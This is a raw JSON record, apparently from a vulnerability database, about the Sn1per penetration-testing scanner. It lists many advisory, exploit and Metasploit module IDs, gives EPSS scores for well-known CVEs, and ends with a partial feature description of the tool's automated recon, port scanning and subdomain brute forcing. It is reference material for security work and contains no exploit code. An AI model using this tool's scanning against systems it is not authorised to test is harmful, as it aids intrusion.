"THN:66C2DBEE768691DF8BF72CAE39867B68", "THN:6C0E5E35ABB362C8EA341381B3DD76D6", "THN:72352D205E5586C5585536F8661A10E4", "THN:7FD924637D99697D78D53283817508DA", "THN:847F48AE6816E6BFF25355FC0EA7439A", "THN:87650195BF482879C3C258B474B11411", "THN:89C2482FECD181DD37C6DAEEB7A66FA9", "THN:8D76D821D51DF9AAAAF1C9D1FA8CA0C5", "THN:8D999AEE5218AD3BFA68E5ACE101F201", "THN:8E5D44939B2B2FF0156F7FF2D4802857", "THN:96A25F981DD18505C101D0FC9DAA7B30", "THN:9C8C2D4F8CFDDE01FAE5FF52244A5073", "THN:ACD3479531482E2CA5A8E15EB6B47523", "THN:AF93AEDBDE6169AD1163D53979A4EA04", "THN:B0F0C0035DAAFA1EC62F15464A80677E", "THN:B95DC27A89565323F0F8E6350D24D801", "THN:EBCB003D7DB7BD8BF73239F9718C6126", "THN:EC04962528DE0054EC31C2501125E303", "THN:EE172E24E32A85AABDE52F47866324C6", "THN:EEB3BA59922DDC6B345B8E6C153593DA", "THN:F03064A70C65D9BD62A8F5898BA276D2", "THN:F8EDB5227B5DA0E4B49064C2972A193D"]}, {"type": "threatpost", "idList": ["THREATPOST:0308A7143D92E14583CCD684912ABD67", "THREATPOST:08BA9FD6E2245EA011F6C29F24929679", "THREATPOST:0DD2AEA1738F9B6612B1C845F3BC949F", "THREATPOST:0FC293825070B81036932BDB41D793B5", "THREATPOST:12E93CDF8BAC1B158CE1737E859FDD80", "THREATPOST:15624C23F5CD5AC1029501D08A99D294", "THREATPOST:1A7A6E9FF0F2A41A6A83EBDE0038383C", "THREATPOST:1C2F8B65F8584E9BF67617A331A7B993", "THREATPOST:1C58BC6383AE29EEEDCF326556EF6630", "THREATPOST:1DED483898A12D8F4397D8C01339AC63", "THREATPOST:1F0994F898084346360FB7C6EFEC201C", "THREATPOST:2086A75F024930F586197B1CF4B4B91A", "THREATPOST:20E3AA69A8819545B9E113C31E8452DD", "THREATPOST:260D48C8E6CF572D5CE165F85C7265E6", "THREATPOST:26EF81FADB8E1A92908C782EBBDB8C88", "THREATPOST:2C5C82CF691D70F64A14DA1BEC242DD5", "THREATPOST:2F30C320035805DB537579B86877517E", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:31661FC1D8CDC4988A6B8EB802933A7B", "THREATPOST:375A1BFC29F5B279C4D5E461D79CE4AA", "THREATPOST:3D545239C6AE58821904FBF3069CB365", "THREATPOST:3DB647F38E79C8BDF5846F520D041C7C", "THREATPOST:420EE567E806D93092741D7BB375AC57", "THREATPOST:4397A021D669D8AF15AA58DF915F8BB6", "THREATPOST:477B6029652B76463B5C5B7155CDF736", "THREATPOST:54ECD02964DEF33573316A94BCE772BD", "THREATPOST:555BCC102B10B8C6CABB0054595AC756", "THREATPOST:5633BBF7C54D598EB76A7B3781EFD2CB", "THREATPOST:5ADABEB29891532ECFF2D6ABD99CAED4", "THREATPOST:5E633FD1C6A5B5BB74F1B6A8399001A2", "THREATPOST:6495B216452F8FF8CDF9A8F13AD41168", "THREATPOST:73B0A9668B2D256140F8DDF19E2E6238", "THREATPOST:752864660896CF677AF67798E68952F0", "THREATPOST:760547BA8017A91CB7219FE7629E28B3", "THREATPOST:76BC692CF25A0009598D6BE4E626ABD9", "THREATPOST:7B2EAFA107D335014D553D78946C453E", "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:812C0E3D711FC77AF4348016C7A094D2", "THREATPOST:87897784F4B89A5B9E8CE18E2324CC70", "THREATPOST:87BEB3651A26414841F6C10CC8797A19", "THREATPOST:88071AD0B76A2548D98F733D0DD3FE1A", "THREATPOST:8D6D4C10987CBF3434080EFF240D2E74", "THREATPOST:9012A325F248438FAC15C4FB3082A796", "THREATPOST:937A7A291D84404C800DF20ADBE20BC1", "THREATPOST:9530BF61FA72CF3E2B226C171BB8C5E7", "THREATPOST:962241D6EFDC7F82640BA9171D82D0B7", "THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "THREATPOST:9F1389C4D97BAD7FDE2519A42E4594E2", "THREATPOST:A45826A8CDA7058392C4901D6AAD15F1", "THREATPOST:A76574D355121BF2CD247CC2DEB6022B", "THREATPOST:AACAA4F654495529E053D43901F00A81", "THREATPOST:AD5395CA5B3FD95FAD8E67B675D0AFCA", "THREATPOST:B7F31FCDC8936516C077D39FEF9235AA", "THREATPOST:BE0A86BAF05C9501D981BE19F3BB40AC", "THREATPOST:BFFC84BE9B4393A9F11FFBECEC203286", "THREATPOST:CB1132219D5713747CDA17DB009B4B24", "THREATPOST:CD1CBFA154DFAA1F3DC0E2E5CFA58D0A", "THREATPOST:CF8A831748EC23AA2B67F64081A55155", "THREATPOST:D3FA06D667A0B326C1598C8BCD106E7D", "THREATPOST:D5150098043DAE7CDF2E31618C33F5D2", "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "THREATPOST:DBB88263397DE4DA6604A2D6517DC194", "THREATPOST:DC4DAA2C2F91148A88C3494B6E55F309", "THREATPOST:E1CCA676B9815B84D887370ABFDEE020", "THREATPOST:E43EB029B562B5665C8385E16145288A", "THREATPOST:E984089A4842B564B374B807AF915A44", "THREATPOST:F4E175435A7C5D2A4F16D46A939B175E", "THREATPOST:F6AE4A5AF20D9E9C8BE6663E8FC80848", "THREATPOST:FC5665486C9D63E5C0C242F47F66ACF1"]}, {"type": "tomcat", "idList": ["TOMCAT:36AC55F275AD6FE594625DBE3DFC1A1C", "TOMCAT:5322371A63B432FEA04126BDF7D1223B", "TOMCAT:A7D3DCFDE9F8C13D1A85F195595ACE5C", "TOMCAT:D72CBF1EC8D17C51BF9944C1A031DFF0"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:2E02CB122DC8C3DB57EF3830829E9913", "TRENDMICROBLOG:5232F354244FCA9F40053F10BE385E28", "TRENDMICROBLOG:5DA0AA0203F450ED9FF0CB21A89017BB", "TRENDMICROBLOG:71F44A4A56FE1111907DD39C26B46152", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6", "TRENDMICROBLOG:F79486D4EB7A8032A33EF8200A559E62"]}, {"type": "ubuntu", "idList": ["USN-2165-1", "USN-2362-1", "USN-3665-1", "USN-4773-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2006-3392", "UB:CVE-2014-0160", "UB:CVE-2014-6271", "UB:CVE-2014-6277", "UB:CVE-2014-6278", "UB:CVE-2014-7169", "UB:CVE-2017-12616", "UB:CVE-2017-12617", "UB:CVE-2017-5638", "UB:CVE-2017-9805", "UB:CVE-2018-11776", "UB:CVE-2018-7600"]}, {"type": "veracode", "idList": ["VERACODE:11323", "VERACODE:11431", "VERACODE:11437", "VERACODE:13434", "VERACODE:3491", "VERACODE:3644", "VERACODE:6042", "VERACODE:6198", "VERACODE:7342"]}, {"type": "vmware", "idList": ["VMSA-2014-0004", "VMSA-2014-0004.7", "VMSA-2014-0010", "VMSA-2014-0010.13", "VMSA-2017-0004", "VMSA-2017-0004.7"]}, {"type": "vulnerlab", "idList": ["VULNERABLE:1254", "VULNERLAB:1254"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:115E09DAC149F2CA9466BA7550E0A5FE"]}, {"type": "zdi", "idList": ["ZDI-09-085"]}, {"type": "zdt", "idList": ["1337DAY-ID-21853", "1337DAY-ID-22114", "1337DAY-ID-22118", "1337DAY-ID-22122", "1337DAY-ID-22129", "1337DAY-ID-22172", "1337DAY-ID-22691", "1337DAY-ID-22692", "1337DAY-ID-22693", "1337DAY-ID-22696", "1337DAY-ID-22699", "1337DAY-ID-22701", "1337DAY-ID-22703", "1337DAY-ID-22713", "1337DAY-ID-22754", "1337DAY-ID-22807", "1337DAY-ID-22882", "1337DAY-ID-23442", "1337DAY-ID-23443", "1337DAY-ID-24039", "1337DAY-ID-24647", "1337DAY-ID-24728", "1337DAY-ID-25423", "1337DAY-ID-25954", "1337DAY-ID-26550", "1337DAY-ID-27300", "1337DAY-ID-27316", "1337DAY-ID-27446", "1337DAY-ID-27757", "1337DAY-ID-28445", "1337DAY-ID-28454", "1337DAY-ID-28706", "1337DAY-ID-28759", "1337DAY-ID-28780", "1337DAY-ID-29395", "1337DAY-ID-29668", "1337DAY-ID-30171", "1337DAY-ID-30199", "1337DAY-ID-30200", "1337DAY-ID-30268", "1337DAY-ID-30298", "1337DAY-ID-30956", "1337DAY-ID-30965", "1337DAY-ID-30966", "1337DAY-ID-31056", "1337DAY-ID-31147", "1337DAY-ID-31749"]}]}, "score": {"value": 10.0, "vector": "NONE"}, "backreferences": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:23A2DE4EE8CE0AE43558095CBB5694B1"]}, {"type": "amazon", "idList": ["ALAS-2017-913"]}, {"type": "archlinux", "idList": ["ASA-201804-1"]}, {"type": "atlassian", "idList": ["ATLASSIAN:BAM-18242", "ATLASSIAN:CWD-4879"]}, {"type": "attackerkb", "idList": ["AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "AKB:3374FB55-2A44-4607-A9C5-265E7DE9B936", "AKB:4AA28DD7-15C7-4892-96A3-0190EA268037", "AKB:7992242A-E0F4-4572-BE13-859467611F09", "AKB:BDF59C15-D64F-45D5-B1AC-D1B9DD354080"]}, {"type": "avleonov", "idList": ["AVLEONOV:101A90D5F21CD7ACE01781C2913D1B6D", "AVLEONOV:54F79F8B5C71E738DB16AEA2DF8FFD2F"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "IIS6_PROPFIND", "STRUTS_OGNL"]}, {"type": "centos", "idList": ["CESA-2017:3080", "CESA-2017:3081"]}, {"type": "cert", "idList": ["VU:112992", "VU:834067"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2014-1336", "CPAI-2017-0197", "CPAI-2017-0249", "CPAI-2017-0676", "CPAI-2017-0742", "CPAI-2017-0779", "CPAI-2017-0827", "CPAI-2017-1088", "CPAI-2018-0192", "CPAI-2018-0459", "CPAI-2018-0849", "CPAI-2018-1697"]}, {"type": "checkpoint_security", "idList": ["CPS:SK100173", "CPS:SK102673", "CPS:SK102989", "CPS:SK104443"]}, {"type": "cisa", "idList": ["CISA:6A3DB540F84D34B9BB99751624D91DB9", "CISA:C0680147E070CCC4182A654B22694B78", "CISA:D39D876E64786DC5F13FB718A4507342"]}, {"type": "cisco", "idList": ["CISCO-SA-20170310-STRUTS2", "CISCO-SA-20170907-STRUTS2"]}, {"type": "citrix", "idList": ["CTX140605"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:C2B8B89ADB85BB41095EAA7D88C0E350"]}, {"type": "cve", "idList": ["CVE-2006-3392", "CVE-2017-10271", "CVE-2017-5638", "CVE-2017-9805", "CVE-2018-10561"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1166-1:E77EB", "DEBIAN:DLA-1325-1:E895C", "DEBIAN:DSA-4156-1:C1814"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2018-7600"]}, {"type": "dsquare", "idList": ["E-627", "E-638", "E-639", "E-643"]}, {"type": "exploitdb", "idList": ["EDB-ID:34839", "EDB-ID:41992", "EDB-ID:42627", "EDB-ID:43924", "EDB-ID:44448", "EDB-ID:44449", "EDB-ID:44482"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:1F2B9BFD5A42DD5C9B0CEA473ED8A8CE", "EXPLOITPACK:35CA87EB321039B8FCD10FF7077070EC", "EXPLOITPACK:643750D6FF631053256ACECA930FF041", "EXPLOITPACK:8840B58ADD10A2BC4E17132A5C7003E8"]}, {"type": "f5", "idList": ["F5:K43451236", "F5:K84144321", "SOL15159"]}, {"type": "fedora", "idList": ["FEDORA:17401605E206", "FEDORA:2C56E6076005", "FEDORA:45D79604B015", "FEDORA:4B26D6048172", "FEDORA:5C39A60311F1", "FEDORA:7595560DCBCA", "FEDORA:9DFEE60469B4", "FEDORA:9FC6E6070D50", "FEDORA:A7FE360648D0", "FEDORA:C2CB46042D4E", "FEDORA:CA868607A1CD", "FEDORA:D89B16076A01", "FEDORA:DB25A6083B5B", "FEDORA:E150A6395ADF"]}, {"type": "fireeye", "idList": ["FIREEYE:399092589F455855881447C60B56C21A", "FIREEYE:C097B41677EDE5F95DB4B84AD6726751"]}, {"type": "fortinet", "idList": ["FG-IR-17-205", "FG-IR-17-251"]}, {"type": "freebsd", "idList": ["5631AE98-BE9E-11E3-B5E3-C80AA9043978", "A9E466E8-4144-11E8-A292-00E04C1EA73D"]}, {"type": "gentoo", "idList": ["GLSA-201412-11"]}, {"type": "github", "idList": ["GHSA-CR6J-3JP9-RW65", "GHSA-GG9M-FJ3V-R58C", "GHSA-J77Q-2QQG-6989"]}, {"type": "githubexploit", "idList": ["0B0F940B-BBCE-52B1-8A3F-6FF63D7BDA4E", "2ED15233-2A01-53F8-A939-8A4D06481CF4", "7BA07704-21CC-5BFC-A0F9-8FDA2BC84402", "B41082A1-4177-53E2-A74C-8ABA13AA3E86"]}, {"type": "hackerone", "idList": ["H1:576887"]}, {"type": "hp", "idList": ["HP:C04468293"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170316-01-STRUTS2"]}, {"type": "ibm", "idList": ["B7DFEA0F0D26A9AEA7F776C2117CB1186584920235B808CDC32E52053CB3C6B0"]}, {"type": "ics", "idList": ["ICSMA-17-215-01"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:4416FB86A8069C419B8EAC9DBF52A644", "IMPERVABLOG:5E50E2263AEAFE98B90E01B16AA73334", "IMPERVABLOG:81785CACF2722C5387530DCFDE54E6E4", "IMPERVABLOG:C40BB28F51D206C8BB23721D1ECED353", "IMPERVABLOG:D4ED0576717DBEEDCF6B9B98BADC92BD", "IMPERVABLOG:DA39045C8E700086C560AAFFDBA589A6"]}, {"type": "jvn", "idList": ["JVN:55667175"]}, {"type": "kaspersky", "idList": ["KLA10999"]}, {"type": "kitploit", "idList": ["KITPLOIT:1841841790447853746", "KITPLOIT:2304674796555328667", "KITPLOIT:4583746754784092967", "KITPLOIT:9079806502812490909"]}, {"type": "krebs", "idList": ["KREBS:EE70929DE902D9B233E209B73C1AD4A0"]}, {"type": "lenovo", "idList": ["LENOVO:PS500093-NOSID"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:4993027161793E66024E0B42522BB53D", "MALWAREBYTES:8AB104C08F6A4BE34498DA02C120E924", "MALWAREBYTES:B49179B9854ECB9B3B25403D4C9D0804"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SERVER/OPENSSL_HEARTBEAT_CLIENT_MEMORY", "MSF:EXPLOIT/MULTI/HTTP/ORACLE_WEBLOGIC_WSAT_DESERIALIZATION_RCE", "MSF:EXPLOIT/MULTI/HTTP/STRUTS2_CONTENT_TYPE_OGNL", "MSF:EXPLOIT/MULTI/HTTP/STRUTS2_REST_XSTREAM", "MSF:EXPLOIT/UNIX/WEBAPP/DRUPAL_DRUPALGEDDON2", "MSF:EXPLOIT/WINDOWS/IIS/IIS_WEBDAV_SCSTORAGEPATHFROMURL"]}, {"type": "mskb", "idList": ["KB3197835"]}, {"type": "myhack58", "idList": ["MYHACK58:62201454156", "MYHACK58:62201784024", "MYHACK58:62201784026", "MYHACK58:62201784086", "MYHACK58:62201784379", "MYHACK58:62201785397", "MYHACK58:62201789104"]}, {"type": "n0where", "idList": ["N0WHERE:76566"]}, {"type": "nessus", "idList": ["ALA_ALAS-2017-913.NASL", "CENTOS_RHSA-2017-3080.NASL", "CENTOS_RHSA-2017-3081.NASL", "CISCO-SA-20180823-APACHE-STRUTS-ISE.NASL", "DRUPAL_8_5_1.NASL", "FEDORA_2017-EF7C118DBC.NASL", "FEDORA_2017-F499EE7B12.NASL", "FEDORA_2018-922CC2FBAA.NASL", "FREEBSD_PKG_A9E466E8414411E8A29200E04C1EA73D.NASL", "ORACLELINUX_ELSA-2017-3080.NASL", "ORACLELINUX_ELSA-2017-3081.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_OCT_2017.NASL", "OT_500424.NASL", "REDHAT-RHSA-2014-1354.NASL", "REDHAT-RHSA-2017-3080.NASL", "REDHAT-RHSA-2017-3081.NASL", "REDHAT-RHSA-2018-0268.NASL", "REDHAT-RHSA-2018-0270.NASL", "REDHAT-RHSA-2018-0275.NASL", "SL_20171030_TOMCAT6_ON_SL6_X.NASL", "SL_20171030_TOMCAT_ON_SL7_X.NASL", "STRUTS_2_5_10_1_WIN_LOCAL.NASL", "STRUTS_2_5_13.NASL", "UBUNTU_USN-3665-1.NASL", "VMWARE_WORKSPACE_PORTAL_VMSA2014-0010.NASL"]}, {"type": "nmap", "idList": ["NMAP:SSL-HEARTBLEED.NSE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310106640", "OPENVAS:1361412562310106646", "OPENVAS:1361412562310106647", "OPENVAS:1361412562310106652", "OPENVAS:1361412562310106653", "OPENVAS:1361412562310106736", "OPENVAS:1361412562310113170", "OPENVAS:1361412562310120077", "OPENVAS:1361412562310121273", "OPENVAS:1361412562310140190", "OPENVAS:1361412562310140228", "OPENVAS:1361412562310140229", "OPENVAS:1361412562310811206", "OPENVAS:1361412562310874382", "OPENVAS:1361412562310874383", "OPENVAS:1361412562310874421", "OPENVAS:1361412562310874422", "OPENVAS:1361412562310874428", "OPENVAS:1361412562310874456", "OPENVAS:1361412562311220191418"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2018-3678067"]}, {"type": "oraclelinux", "idList": ["ELSA-2017-3080", "ELSA-2017-3081"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:141576", "PACKETSTORM:141630", "PACKETSTORM:142471", "PACKETSTORM:144034", "PACKETSTORM:144050", "PACKETSTORM:146143", "PACKETSTORM:147181", "PACKETSTORM:147182", "PACKETSTORM:147247", "PACKETSTORM:147392", "PACKETSTORM:147482", "PACKETSTORM:149467"]}, {"type": "pentestit", "idList": ["PENTESTIT:37744BAB82BC3A7B208CCD4945FA50F7"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:072B2FAC9B9B391A9AAB97CB87BCCB8C", "QUALYSBLOG:110CC96D8440CC2A1EA0521D300634ED", "QUALYSBLOG:1A5EE9D9F7F017B2137FF614703A8605", "QUALYSBLOG:5C311FA52DD78D7015076D492F321DB0", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:078B46BBA3057CDE37845D48479CC3DD"]}, {"type": "redhat", "idList": ["RHSA-2014:0416", "RHSA-2014:1312", "RHSA-2017:3113"]}, {"type": "redhatcve", "idList": ["RH:CVE-2018-11776"]}, {"type": "saint", "idList": ["SAINT:01D1CBFEFCD799FC1DCF4DD30F44F248", "SAINT:1AF820E0642E7888070E0C7DD723BBAE", "SAINT:420D07B85504086850EFAA31B8BCAEB5", "SAINT:49062325B1FAB54D731E4C8FBF78D940", "SAINT:966010900F7632E797C552D31C2BB53A", "SAINT:E218D6FA073276BB012BADF2CCE50F0E"]}, {"type": "securelist", "idList": ["SECURELIST:376CB760FDD4E056A8D0695A9EB9756A", "SECURELIST:6FF73BA3D8BB759BAC6F6A8B20F0F19D"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:31100", "SECURITYVULNS:DOC:31103"]}, {"type": "seebug", "idList": ["SSV:62185", "SSV:87270", "SSV:92746", "SSV:92804", "SSV:92834", "SSV:95013", "SSV:96420"]}, {"type": "slackware", "idList": ["SSA-2014-267-01"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2017:3069-1", "SUSE-SU-2014:1213-1", "SUSE-SU-2014:1223-1", "SUSE-SU-2017:3039-1", "SUSE-SU-2017:3059-1"]}, {"type": "symantec", "idList": ["SMNTC-1419"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A6B70436696A7578F1EF6B7090D11B59", "TALOSBLOG:DB8F26399F12B0F9B9309365CB42D9BB"]}, {"type": "thn", "idList": ["THN:129FB15A6EC81B3F21210807A7547381", "THN:2707247140A4F620671B33D68FEB1EA9", "THN:3F47D7B66C8A65AB31FAC5823C96C34D", "THN:460709FF530ED7F35B5817A55F1BF2C6", "THN:491E94A14CDEFCFFF9753033F61D1E0E", "THN:66C2DBEE768691DF8BF72CAE39867B68", "THN:6C0E5E35ABB362C8EA341381B3DD76D6", "THN:8D76D821D51DF9AAAAF1C9D1FA8CA0C5", "THN:8E5D44939B2B2FF0156F7FF2D4802857", "THN:96A25F981DD18505C101D0FC9DAA7B30", "THN:9C8C2D4F8CFDDE01FAE5FF52244A5073", "THN:ACD3479531482E2CA5A8E15EB6B47523", "THN:B0F0C0035DAAFA1EC62F15464A80677E", "THN:EE172E24E32A85AABDE52F47866324C6", "THN:F03064A70C65D9BD62A8F5898BA276D2", "THN:F8EDB5227B5DA0E4B49064C2972A193D"]}, {"type": "threatpost", "idList": ["THREATPOST:0308A7143D92E14583CCD684912ABD67", "THREATPOST:1A7A6E9FF0F2A41A6A83EBDE0038383C", "THREATPOST:2F30C320035805DB537579B86877517E", "THREATPOST:31661FC1D8CDC4988A6B8EB802933A7B", "THREATPOST:3D545239C6AE58821904FBF3069CB365", "THREATPOST:477B6029652B76463B5C5B7155CDF736", "THREATPOST:54ECD02964DEF33573316A94BCE772BD", "THREATPOST:5633BBF7C54D598EB76A7B3781EFD2CB", "THREATPOST:5ADABEB29891532ECFF2D6ABD99CAED4", "THREATPOST:5E633FD1C6A5B5BB74F1B6A8399001A2", "THREATPOST:6495B216452F8FF8CDF9A8F13AD41168", "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:87BEB3651A26414841F6C10CC8797A19", "THREATPOST:88071AD0B76A2548D98F733D0DD3FE1A", "THREATPOST:937A7A291D84404C800DF20ADBE20BC1", "THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "THREATPOST:A76574D355121BF2CD247CC2DEB6022B", "THREATPOST:AD5395CA5B3FD95FAD8E67B675D0AFCA", "THREATPOST:CB1132219D5713747CDA17DB009B4B24", "THREATPOST:CD1CBFA154DFAA1F3DC0E2E5CFA58D0A", "THREATPOST:D5150098043DAE7CDF2E31618C33F5D2", "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "THREATPOST:E1CCA676B9815B84D887370ABFDEE020", "THREATPOST:E43EB029B562B5665C8385E16145288A", "THREATPOST:FC5665486C9D63E5C0C242F47F66ACF1"]}, {"type": "tomcat", "idList": ["TOMCAT:36AC55F275AD6FE594625DBE3DFC1A1C"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:2E02CB122DC8C3DB57EF3830829E9913", "TRENDMICROBLOG:5232F354244FCA9F40053F10BE385E28", "TRENDMICROBLOG:5DA0AA0203F450ED9FF0CB21A89017BB"]}, {"type": "ubuntu", "idList": ["USN-3665-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2014-0160", "UB:CVE-2018-7600"]}, {"type": "vmware", "idList": ["VMSA-2017-0004.7"]}, {"type": "vulnerlab", "idList": ["VULNERLAB:1254"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:115E09DAC149F2CA9466BA7550E0A5FE"]}, {"type": "zdi", "idList": ["ZDI-09-085"]}, {"type": "zdt", "idList": ["1337DAY-ID-22692", "1337DAY-ID-22754", "1337DAY-ID-22882", "1337DAY-ID-24039", "1337DAY-ID-27446", "1337DAY-ID-27757", "1337DAY-ID-28445", "1337DAY-ID-28454", "1337DAY-ID-28706", "1337DAY-ID-28780", "1337DAY-ID-29395", "1337DAY-ID-29668", "1337DAY-ID-30171", "1337DAY-ID-30199", "1337DAY-ID-30200", "1337DAY-ID-30268", "1337DAY-ID-30298"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2006-3392", "epss": 0.96239, "percentile": 0.99226, "modified": "2023-05-07"}, {"cve": "CVE-2009-3843", "epss": 0.90606, "percentile": 0.98298, "modified": "2023-05-08"}, {"cve": "CVE-2014-0160", "epss": 0.97588, "percentile": 1.0, "modified": "2023-05-07"}, {"cve": "CVE-2014-6271", "epss": 0.9756, "percentile": 0.99995, "modified": "2023-05-07"}, {"cve": "CVE-2015-8249", "epss": 0.9537, "percentile": 0.98989, "modified": "2023-05-08"}, {"cve": "CVE-2017-10271", "epss": 0.97501, "percentile": 0.99957, "modified": "2023-05-08"}, {"cve": "CVE-2017-12617", "epss": 0.97502, "percentile": 0.99961, "modified": "2023-05-07"}, {"cve": "CVE-2017-5638", "epss": 0.97548, "percentile": 0.99991, "modified": "2023-05-07"}, {"cve": "CVE-2017-7269", "epss": 0.97156, "percentile": 0.99658, "modified": "2023-05-08"}, {"cve": "CVE-2017-9805", "epss": 0.97538, "percentile": 0.99986, "modified": "2023-05-07"}, {"cve": "CVE-2018-10561", "epss": 0.97529, "percentile": 0.99981, "modified": "2023-05-07"}, {"cve": "CVE-2018-11776", "epss": 0.97556, "percentile": 0.99994, "modified": "2023-05-07"}, {"cve": "CVE-2018-7600", "epss": 0.97571, "percentile": 0.99998, "modified": "2023-05-07"}], "vulnersScore": 10.0}, "_state": {"dependencies": 1702069560, "score": 1702068971, "epss": 0}, "_internal": {"score_hash": "099040573c6c03ecf5b22b744b9b3890"}, "toolHref": "https://github.com/1N3/Sn1per"}

{"kitploit": [{"lastseen": "2023-12-08T20:51:07", "description": "[![](https://4.bp.blogspot.com/-P3_9VWnPhLw/WzvPRBF6q3I/AAAAAAAALtk/nE4XtcDGmXELo4KLTzEDoCiNMEgF0VJAACLcBGAs/s640/Sn1per_1_Sn1per.jpeg)](<https://4.bp.blogspot.com/-P3_9VWnPhLw/WzvPRBF6q3I/AAAAAAAALtk/nE4XtcDGmXELo4KLTzEDoCiNMEgF0VJAACLcBGAs/s1600/Sn1per_1_Sn1per.jpeg>)\n\n \n\n\nSn1per Community Edition is an [automated scanner](<https://www.kitploit.com/search/label/Automated%20scanner>) that can be used during a [penetration test](<https://www.kitploit.com/search/label/Penetration%20Test>) to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes.\n\n \n**SN1PER PROFESSIONAL FEATURES:** \n \n**Professional reporting interface** \n \n\n\n[![](https://3.bp.blogspot.com/-CUaHGxKs7i8/WzvPDvnvnUI/AAAAAAAALtg/6NzvIUFvET0YO8X9SXkxbSXD51R9dgn_QCLcBGAs/s640/Sn1per_8.png)](<https://3.bp.blogspot.com/-CUaHGxKs7i8/WzvPDvnvnUI/AAAAAAAALtg/6NzvIUFvET0YO8X9SXkxbSXD51R9dgn_QCLcBGAs/s1600/Sn1per_8.png>)\n\n \n**Slideshow for all gathered screenshots** \n \n\n\n[![](https://3.bp.blogspot.com/-ElnqBSUrveU/WzvPZw0s4FI/AAAAAAAALto/xOUximDoNkMni5XhkzmMDnI9caTUWdo3gCLcBGAs/s640/Sn1per_9.png)](<https://3.bp.blogspot.com/-ElnqBSUrveU/WzvPZw0s4FI/AAAAAAAALto/xOUximDoNkMni5XhkzmMDnI9caTUWdo3gCLcBGAs/s1600/Sn1per_9.png>)\n\n \n**Searchable and sortable DNS, IP and open port database** \n \n\n\n[![](https://3.bp.blogspot.com/-U5MHC2iK1ag/WzvPfoIz6nI/AAAAAAAALts/m-GOz4roSSEhYjSeZgakgEJxo4-xCSlIQCLcBGAs/s640/Sn1per_10.png)](<https://3.bp.blogspot.com/-U5MHC2iK1ag/WzvPfoIz6nI/AAAAAAAALts/m-GOz4roSSEhYjSeZgakgEJxo4-xCSlIQCLcBGAs/s1600/Sn1per_10.png>)\n\n \n \n**Categorized host reports** \n \n\n\n[![](https://4.bp.blogspot.com/-b82btbNLylE/WzvPj6ds37I/AAAAAAAALt0/KgxDw1g6rCgCuDamA3v_GBIHTAs-No2DwCLcBGAs/s1600/Sn1per_11.png)](<https://4.bp.blogspot.com/-b82btbNLylE/WzvPj6ds37I/AAAAAAAALt0/KgxDw1g6rCgCuDamA3v_GBIHTAs-No2DwCLcBGAs/s1600/Sn1per_11.png>)\n\n \n \n**Quick links to online recon tools and Google hacking queries** \n \n\n\n[![](https://4.bp.blogspot.com/-eB0eLBg1-Xs/WzvPsgtbmGI/AAAAAAAALt8/FSkOuUJlOb0YXRetzL4TYbuLeOmRaQtOwCLcBGAs/s640/Sn1per_12.png)](<https://4.bp.blogspot.com/-eB0eLBg1-Xs/WzvPsgtbmGI/AAAAAAAALt8/FSkOuUJlOb0YXRetzL4TYbuLeOmRaQtOwCLcBGAs/s1600/Sn1per_12.png>)\n\n \n**Personalized notes field for each host** \n \n\n\n[![](https://1.bp.blogspot.com/-4SndSkZX88U/WzvPxUain4I/AAAAAAAALuE/x7ZucGGcTPIOGerWwlbWvXrFVosouiOhwCLcBGAs/s640/Sn1per_13.png)](<https://1.bp.blogspot.com/-4SndSkZX88U/WzvPxUain4I/AAAAAAAALuE/x7ZucGGcTPIOGerWwlbWvXrFVosouiOhwCLcBGAs/s1600/Sn1per_13.png>)\n\n \n \n**DEMO VIDEO:** \n[![Demo](https://camo.githubusercontent.com/7ce47e489c830c05433d8352244c219380f67648/68747470733a2f2f61736369696e656d612e6f72672f612f4944636b453438424e5357513854563879456a4a6a6a4d4e6d2e706e67)](<https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm>) \n \n**SN1PER COMMUNITY FEATURES:** \n\n\n * * Automatically collects basic recon (ie. whois, ping, DNS, etc.)\n * Automatically launches Google hacking queries against a target domain\n * Automatically enumerates open ports via NMap port scanning\n * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers\n * Automatically checks for sub-domain hijacking\n * Automatically runs targeted NMap scripts against open ports\n * Automatically runs 